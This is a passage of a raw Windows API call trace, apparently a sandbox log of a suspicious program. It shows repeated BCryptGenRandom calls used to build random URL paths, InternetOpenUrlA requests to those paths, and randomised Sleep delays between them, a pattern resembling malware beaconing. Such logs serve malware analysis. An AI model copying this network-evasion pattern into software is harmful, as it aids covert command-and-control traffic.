0x7ffc5bcc36b0 [0175.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0175.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.423] GetProcessHeap () returned 0x440000 [0175.423] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5170 [0175.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5171, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x4f5171) returned 0x0 [0175.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.683] GetProcessHeap () returned 0x440000 [0175.683] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0175.683] lstrcpyA (in: lpString1=0x473b90, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0175.683] lstrcatA (in: lpString1="\x04", lpString2="/rr38mLkwwaPHobbzeumbxalcK5rzrS10w/" | out: lpString1="\x04/rr38mLkwwaPHobbzeumbxalcK5rzrS10w/") returned="\x04/rr38mLkwwaPHobbzeumbxalcK5rzrS10w/" [0175.684] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0175.684] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/rr38mLkwwaPHobbzeumbxalcK5rzrS10w/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0175.684] GetProcessHeap () returned 0x440000 [0175.684] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0175.684] GetProcessHeap () returned 0x440000 [0175.684] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5170 | out: hHeap=0x440000) returned 1 [0175.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0175.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0175.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0175.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0175.687] Sleep (dwMilliseconds=0xfe54) [0175.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0175.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.845] GetProcessHeap () returned 0x440000 [0175.846] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0175.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0175.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26f, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b26f) returned 0x0 [0175.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0175.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.858] GetProcessHeap () returned 0x440000 [0175.858] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0175.858] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0175.858] lstrcatA (in: lpString1="\x04", lpString2="/dxhxc8h70ijvvbrl8fhvaeuyQzb62/sw4bgyQ6sl7yaU04432sL5YO63o9/" | out: lpString1="\x04/dxhxc8h70ijvvbrl8fhvaeuyQzb62/sw4bgyQ6sl7yaU04432sL5YO63o9/") returned="\x04/dxhxc8h70ijvvbrl8fhvaeuyQzb62/sw4bgyQ6sl7yaU04432sL5YO63o9/" [0175.858] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0175.858] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/dxhxc8h70ijvvbrl8fhvaeuyQzb62/sw4bgyQ6sl7yaU04432sL5YO63o9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0175.858] GetProcessHeap () returned 0x440000 [0175.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0175.858] GetProcessHeap () returned 0x440000 [0175.858] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0175.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0175.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0175.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0175.859] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0175.859] Sleep (dwMilliseconds=0x17219) [0176.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0176.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.071] GetProcessHeap () returned 0x440000 [0176.071] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a168a0 [0176.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.071] GetProcAddress 